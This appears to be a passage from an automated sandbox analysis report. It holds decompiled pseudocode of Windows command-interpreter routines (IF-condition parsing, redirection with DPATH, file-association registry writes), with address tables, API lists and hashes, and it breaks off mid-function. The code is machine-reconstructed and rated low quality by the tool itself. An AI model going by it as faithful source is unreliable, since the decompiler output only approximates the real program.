                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3ABE
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3ACB
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD621,00000001,011F977C,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3AE0
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3AED
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                    • String ID:
                                                    • API String ID: 2002953238-0
                                                    • Opcode ID: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                                    • Instruction ID: 2a932ff4d00e50243cfc1cb7b4d9efb4e6b448031b20eb7c8a4e544b029da471
                                                    • Opcode Fuzzy Hash: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                                    • Instruction Fuzzy Hash: F451E472E20205AFDF29CF69D848BB9BBB9FF94710F04405DEA25DB280C7718984CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DCDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 32%
                                                    			E011DCDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E011DF030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E011F82EB(0);
				}
				_t4 = E011DE9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0x120faa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E011DEA40(E011DDDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0x1213cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0x120faa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E011F82EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E011DCDA2(1);
							goto L12;
						}
						E011DF300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E011D9520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0x1213cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}











                                                    0x011dcdaa
                                                    0x011dcdae
                                                    0x011dcdb2
                                                    0x011dcdb7
                                                    0x011dcdbc
                                                    0x011eb3f9
                                                    0x011eb3f9
                                                    0x011dcdc4
                                                    0x011dcdce
                                                    0x011dcdd6
                                                    0x011dcddd
                                                    0x011dcde0
                                                    0x011eb403
                                                    0x00000000
                                                    0x011dcde6
                                                    0x011dcdec
                                                    0x011dcdf3
                                                    0x011dcdf6
                                                    0x011dce9a
                                                    0x011dce86
                                                    0x011dce93
                                                    0x011dce7b
                                                    0x011dce7b
                                                    0x011dce60
                                                    0x011dce68
                                                    0x011dce68
                                                    0x011dce03
                                                    0x011dce36
                                                    0x011dce3c
                                                    0x011dce43
                                                    0x011dce46
                                                    0x011dce69
                                                    0x011dce6b
                                                    0x011dcea2
                                                    0x011dcea2
                                                    0x011dce6f
                                                    0x011dce75
                                                    0x011dce76
                                                    0x00000000
                                                    0x011dce76
                                                    0x011dce4e
                                                    0x011dce55
                                                    0x011dce5b
                                                    0x00000000
                                                    0x011dce5b
                                                    0x011dce0b
                                                    0x011dce12
                                                    0x011dce15
                                                    0x011eb40e
                                                    0x00000000
                                                    0x011eb40e
                                                    0x011dce22
                                                    0x00000000
                                                    0x00000000
                                                    0x011dce2a
                                                    0x011dce31
                                                    0x011dce34
                                                    0x011dce80
                                                    0x00000000
                                                    0x011dce80
                                                    0x00000000
                                                    0x011dce34

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                    • API String ID: 2081463915-1668778490
                                                    • Opcode ID: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                                    • Instruction ID: c7bf34167b3254974b6e8411aea9e032114d969f92fb0106cb8cb3ad50d2847c
                                                    • Opcode Fuzzy Hash: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                                    • Instruction Fuzzy Hash: 08210BB16487139AFB3D5B7AA81972B7ECEDF541A4F14481FE143811C0EF759840C39A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DD97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E011DD97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0x1213cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E011DDBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E011DD937();
									_t134 = 0x1213d00;
									E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
									E011DC5A2(_t105, 0x2344, 1, 0x1213d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E011DD120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E011DDBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E011DDB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E011DD937();
											E011F985A( *0x1213cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E011E3320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E011DD120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E011E0178(_t68) == 0) {
								_t82 = E011F9953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0x1213d00;
								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
								_push(0x1213d00);
								_push(1);
								_push(0x40002721);
								L51:
								E011DC5A2(_t114);
								 *(_t129 + 8) = _t95;
								E011DD937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E011DDBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0x1213d00;
								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
								_push(0x1213d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E011DDB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E011E00B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0x1213cd4;
					 *0x1213cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E011E22C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E011E1040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}




































                                                    0x011dd97e
                                                    0x011dd989
                                                    0x011dd990
                                                    0x011dd996
                                                    0x011dd99b
                                                    0x011dd9a1
                                                    0x011dd9a3
                                                    0x011dd9ae
                                                    0x011dd9b1
                                                    0x011dd9b3
                                                    0x011dd9b8
                                                    0x011dd9be
                                                    0x011dd9e4
                                                    0x011ddb8d
                                                    0x011ddb8f
                                                    0x011ddb50
                                                    0x011ddb53
                                                    0x011ddb6c
                                                    0x011ddb6c
                                                    0x011dd9ea
                                                    0x011dd9ef
                                                    0x011dda55
                                                    0x011dda55
                                                    0x011dda5e
                                                    0x011eba31
                                                    0x011eba36
                                                    0x011dda8d
                                                    0x011dda8d
                                                    0x011dda92
                                                    0x00000000
                                                    0x00000000
                                                    0x011dda98
                                                    0x011dda9b
                                                    0x011dda9e
                                                    0x00000000
                                                    0x00000000
                                                    0x011ddaa6
                                                    0x011ddaaf
                                                    0x011eba90
                                                    0x011eba90
                                                    0x011ddaef
                                                    0x011ddaef
                                                    0x011ddaf6
                                                    0x011ddb6f
                                                    0x011ddb76
                                                    0x011ddb7c
                                                    0x011ddb86
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebb58
                                                    0x011ebb58
                                                    0x011ebb5f
                                                    0x011ebb6f
                                                    0x011ebb7c
                                                    0x00000000
                                                    0x011ebb81
                                                    0x011ddafd
                                                    0x011ddafe
                                                    0x011eba98
                                                    0x011eba9d
                                                    0x011ebaa2
                                                    0x011ebaaa
                                                    0x011ddb2a
                                                    0x011ddb2c
                                                    0x011ebaff
                                                    0x011ebb03
                                                    0x011ebb08
                                                    0x011ebb0e
                                                    0x011ebb10
                                                    0x011ebb18
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebb1a
                                                    0x011ebb1c
                                                    0x011ebb1c
                                                    0x011ddb34
                                                    0x011ebb89
                                                    0x011ebb89
                                                    0x011ebb94
                                                    0x00000000
                                                    0x011ebb94
                                                    0x011ddb40
                                                    0x00000000
                                                    0x011ddb40
                                                    0x011ebab5
                                                    0x011ebabc
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebac2
                                                    0x011ebac7
                                                    0x011ebac9
                                                    0x011ebac9
                                                    0x011ebae1
                                                    0x00000000
                                                    0x011ebae7
                                                    0x011ebae7
                                                    0x011ebaec
                                                    0x011ebaee
                                                    0x011ebaee
                                                    0x011ebaf4
                                                    0x011ebaf5
                                                    0x011ddb17
                                                    0x011ddb17
                                                    0x011ddb1c
                                                    0x011ddb24
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ddb24
                                                    0x011ebae1
                                                    0x011ddb09
                                                    0x011ddb11
                                                    0x00000000
                                                    0x011ddb11
                                                    0x011ddab7
                                                    0x011ddac1
                                                    0x00000000
                                                    0x00000000
                                                    0x011ddad0
                                                    0x011eba43
                                                    0x011eba4a
                                                    0x00000000
                                                    0x00000000
                                                    0x011eba56
                                                    0x011eba5c
                                                    0x011eba66
                                                    0x00000000
                                                    0x00000000
                                                    0x011eba6e
                                                    0x011eba7e
                                                    0x011eba83
                                                    0x011eba84
                                                    0x011eba86
                                                    0x011ebb43
                                                    0x011ebb43
                                                    0x011ebb4b
                                                    0x011ebb4e
                                                    0x00000000
                                                    0x011ebb4e
                                                    0x011ddad6
                                                    0x011ddad6
                                                    0x011ddad8
                                                    0x011ddadd
                                                    0x011ddae2
                                                    0x011ebb26
                                                    0x011ebb36
                                                    0x011ebb3b
                                                    0x011ebb3c
                                                    0x011ebb3e
                                                    0x00000000
                                                    0x011ebb3e
                                                    0x011ddaea
                                                    0x00000000
                                                    0x011ddb43
                                                    0x011ddb43
                                                    0x011ddb46
                                                    0x011ddb48
                                                    0x00000000
                                                    0x011dda9b
                                                    0x011dda66
                                                    0x011dda67
                                                    0x011dda6c
                                                    0x011dda74
                                                    0x00000000
                                                    0x00000000
                                                    0x011dda80
                                                    0x011dda83
                                                    0x011dda88
                                                    0x011dda8b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd9f1
                                                    0x011dd9f1
                                                    0x011dd9f1
                                                    0x011dd9f4
                                                    0x011dd9f6
                                                    0x011dd9f9
                                                    0x011dd9f9
                                                    0x011dd9fc
                                                    0x011dd9ff
                                                    0x011dda08
                                                    0x011dda10
                                                    0x011dda14
                                                    0x011dda1c
                                                    0x00000000
                                                    0x00000000
                                                    0x011dda1e
                                                    0x011dda21
                                                    0x011dda23
                                                    0x011dda26
                                                    0x011dda26
                                                    0x011dda29
                                                    0x011dda2c
                                                    0x011dda35
                                                    0x011dda39
                                                    0x011eba28
                                                    0x011eba28
                                                    0x011dda46
                                                    0x011dda46
                                                    0x011dda49
                                                    0x011dda4b
                                                    0x011dda4f
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011DD9BE
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • _get_osfhandle.MSVCRT ref: 011DDAA6
                                                    • _get_osfhandle.MSVCRT ref: 011DDAB7
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DDB53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _get_osfhandlememset
                                                    • String ID: DPATH
                                                    • API String ID: 3784859044-2010427443
                                                    • Opcode ID: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                                    • Instruction ID: 63e866420da51ac2be241b7621f2ca99e67be17c8e9060e40eaa3eab2779bae5
                                                    • Opcode Fuzzy Hash: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                                    • Instruction Fuzzy Hash: E0912870A00516AFDF2DEFE8EC88AAABBE1FF54318B144159E505972C4DB31A980CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F59E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E011F59E6(void* __ecx, signed int __edx, char* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				void* _v540;
				long _v544;
				int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				short* _t44;
				signed short* _t52;
				char _t55;
				signed short _t62;
				long _t67;
				signed short _t69;
				signed int _t71;
				short* _t73;
				signed int _t75;
				char* _t85;
				void* _t88;
				signed short _t90;
				char* _t93;
				intOrPtr* _t94;
				signed short* _t98;
				void* _t99;
				signed int _t100;

				_t39 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t39 ^ _t100;
				_t75 = __edx;
				_v540 = __ecx;
				_t94 = __edx;
				_v532 = __edx;
				_t93 = _a4;
				_t90 = __edx + 2;
				do {
					_t41 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t41 != 0);
				if((_t94 - _t90 >> 1) + 0x14 <= 0x104) {
					E011E1040( &_v528, 0x104, __edx);
					_t90 = 0x104;
					_t44 =  &_v528;
					while( *_t44 != 0) {
						_t44 = _t44 + 2;
						_t90 = _t90 - 1;
						if(_t90 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t82 =  ~_t90 & 0x00000104 - _t90;
					if(_t90 != 0) {
						_t73 =  &(( &_v528)[_t82]);
						_t99 = 0x104 - _t82;
						if(_t99 == 0) {
							L15:
							_t73 = _t73 - 2;
						} else {
							_t88 = 0x7ffffffe;
							_t90 = L"\\Shell\\Open\\Command" - _t73;
							while(_t88 != 0) {
								_t75 = _v532;
								if(( *(_t73 + _t90) & 0x0000ffff) == 0) {
									break;
								} else {
									_t88 = _t88 - 1;
									 *_t73 =  *(_t73 + _t90) & 0x0000ffff;
									_t73 =  &(_t73[1]);
									_t75 = _v532;
									_t99 = _t99 - 1;
									if(_t99 != 0) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L16;
							}
							if(_t99 == 0) {
								goto L15;
							}
						}
						L16:
						_t82 = 0;
						 *_t73 = 0;
					}
					_t98 = RegOpenKeyExW(_v540,  &_v528, 0, 0x2000000,  &_v536);
					if(_t98 == 0) {
						L30:
						if(_t93 == 0 ||  *_t93 == 0) {
							_t98 = RegDeleteValueW(_v536, 0);
							if(_t98 != 0) {
								E011DC5A2(_t82, 0x400023a5, 1, _t75);
								goto L39;
							}
						} else {
							_t85 = _t93;
							_t90 =  &(_t85[2]);
							do {
								_t55 =  *_t85;
								_t85 =  &(_t85[2]);
							} while (_t55 != 0);
							_t87 = _t85 - _t90 >> 1;
							_t98 = RegSetValueExW(_v536, 0x11d24ac, 0, 2, _t93, 2 + (_t85 - _t90 >> 1) * 2);
							if(_t98 != 0) {
								_push(0);
								_push(_t98);
								E011DC5A2(_t87);
								E011DC5A2(_t87, 0x235d, 1, _t75);
							} else {
								_push(_t93);
								_push(_t75);
								E011E25D9(L"%s=%s\r\n");
								L39:
							}
						}
						RegCloseKey(_v536);
						goto L41;
					} else {
						if(_t93 == 0 ||  *_t93 == 0) {
							E011DC5A2(_t82, 0x400023a5, 1, _t75);
							L41:
							_t52 = _t98;
						} else {
							_t98 =  &_v528;
							while(1) {
								_t62 =  *_t98 & 0x0000ffff;
								_t82 = _t62;
								_v532 = _t62;
								if(_t62 == 0) {
									goto L25;
								}
								_t90 = _t62;
								while(1) {
									_t82 = _t90 & 0x0000ffff;
									_v532 = _t90 & 0x0000ffff;
									if(_t90 == 0x5c) {
										goto L25;
									}
									_t71 = _t98[1] & 0x0000ffff;
									_t98 =  &(_t98[1]);
									_t82 = _t71;
									_t90 = _t71;
									_v532 = _t71;
									if(_t71 != 0) {
										continue;
									}
									goto L25;
								}
								L25:
								 *_t98 = 0;
								_t67 = RegCreateKeyExW(_v540,  &_v528, 0, 0, 0, 0x2000000, 0,  &_v536,  &_v548);
								_v544 = _t67;
								if(_t67 != 0) {
									E011DC5A2(_t82, 0x400023a5, 1, _t75);
									_t52 = _v544;
								} else {
									_t69 = _v532;
									if(_t69 == 0) {
										goto L30;
									} else {
										 *_t98 = _t69;
										_t98 =  &(_t98[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L42;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E011DC5A2(__ecx);
					_t52 = 1;
				}
				L42:
				return E011E6FD0(_t52, _t75, _v8 ^ _t100, _t90, _t93, _t98);
			}
































                                                    0x011f59f1
                                                    0x011f59f8
                                                    0x011f59fc
                                                    0x011f59fe
                                                    0x011f5a05
                                                    0x011f5a07
                                                    0x011f5a0e
                                                    0x011f5a11
                                                    0x011f5a16
                                                    0x011f5a16
                                                    0x011f5a19
                                                    0x011f5a1c
                                                    0x011f5a2d
                                                    0x011f5a56
                                                    0x011f5a5b
                                                    0x011f5a5d
                                                    0x011f5a66
                                                    0x011f5a6c
                                                    0x011f5a6f
                                                    0x011f5a72
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5a72
                                                    0x011f5a7c
                                                    0x011f5a7e
                                                    0x011f5a82
                                                    0x011f5a8a
                                                    0x011f5a8d
                                                    0x011f5a8f
                                                    0x011f5acc
                                                    0x011f5acc
                                                    0x011f5a91
                                                    0x011f5a96
                                                    0x011f5a9b
                                                    0x011f5a9d
                                                    0x011f5aa8
                                                    0x011f5aae
                                                    0x00000000
                                                    0x011f5ab0
                                                    0x011f5ab4
                                                    0x011f5ab5
                                                    0x011f5ab8
                                                    0x011f5abb
                                                    0x011f5ac1
                                                    0x011f5ac4
                                                    0x00000000
                                                    0x011f5ac6
                                                    0x00000000
                                                    0x011f5ac6
                                                    0x011f5ac4
                                                    0x00000000
                                                    0x011f5aae
                                                    0x011f5aca
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5aca
                                                    0x011f5acf
                                                    0x011f5acf
                                                    0x011f5ad1
                                                    0x011f5ad1
                                                    0x011f5af5
                                                    0x011f5af9
                                                    0x011f5bdd
                                                    0x011f5bdf
                                                    0x011f5c55
                                                    0x011f5c59
                                                    0x011f5c63
                                                    0x00000000
                                                    0x011f5c63
                                                    0x011f5be7
                                                    0x011f5be7
                                                    0x011f5be9
                                                    0x011f5bec
                                                    0x011f5bec
                                                    0x011f5bef
                                                    0x011f5bf2
                                                    0x011f5bf9
                                                    0x011f5c19
                                                    0x011f5c1d
                                                    0x011f5c2d
                                                    0x011f5c2f
                                                    0x011f5c30
                                                    0x011f5c3d
                                                    0x011f5c1f
                                                    0x011f5c1f
                                                    0x011f5c20
                                                    0x011f5c26
                                                    0x011f5c68
                                                    0x011f5c68
                                                    0x011f5c1d
                                                    0x011f5c71
                                                    0x00000000
                                                    0x011f5aff
                                                    0x011f5b01
                                                    0x011f5bd0
                                                    0x011f5c77
                                                    0x011f5c77
                                                    0x011f5b11
                                                    0x011f5b11
                                                    0x011f5b17
                                                    0x011f5b17
                                                    0x011f5b1a
                                                    0x011f5b1c
                                                    0x011f5b25
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5b27
                                                    0x011f5b29
                                                    0x011f5b29
                                                    0x011f5b2c
                                                    0x011f5b36
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5b38
                                                    0x011f5b3c
                                                    0x011f5b3f
                                                    0x011f5b41
                                                    0x011f5b43
                                                    0x011f5b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f5b4c
                                                    0x011f5b4e
                                                    0x011f5b50
                                                    0x011f5b7b
                                                    0x011f5b81
                                                    0x011f5b89
                                                    0x011f5bb5
                                                    0x011f5bba
                                                    0x011f5b8b
                                                    0x011f5b8b
                                                    0x011f5b94
                                                    0x00000000
                                                    0x011f5b96
                                                    0x011f5b9c
                                                    0x011f5b9f
                                                    0x011f5ba2
                                                    0x00000000
                                                    0x011f5ba2
                                                    0x011f5b94
                                                    0x00000000
                                                    0x011f5b89
                                                    0x011f5b17
                                                    0x011f5b01
                                                    0x011f5a2f
                                                    0x011f5a2f
                                                    0x011f5a31
                                                    0x011f5a36
                                                    0x011f5a3e
                                                    0x011f5a3e
                                                    0x011f5c79
                                                    0x011f5c89

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 011F5AEF
                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 011F5B7B
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5BA2
                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,00000000,00000002,?,00000000), ref: 011F5C13
                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 011F5C4F
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5C71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseValue$CreateDeleteOpen
                                                    • String ID: %s=%s$\Shell\Open\Command
                                                    • API String ID: 4081037667-3301834661
                                                    • Opcode ID: 5fb341b44867538043849bf8843b4877a587152ffdcb3b721eea214cbf49da9b
                                                    • Instruction ID: 4611ca80388571c73a2f4885fb820918cd75239cb0cef39727a3310818eb0d83
                                                    • Opcode Fuzzy Hash: 5fb341b44867538043849bf8843b4877a587152ffdcb3b721eea214cbf49da9b
                                                    • Instruction Fuzzy Hash: B6713071E4031A9BEB3D9B1CCC59BEA77BAEF54700F15019DEA09A7180DB709E84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F6B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E011F6B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0x11d3a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
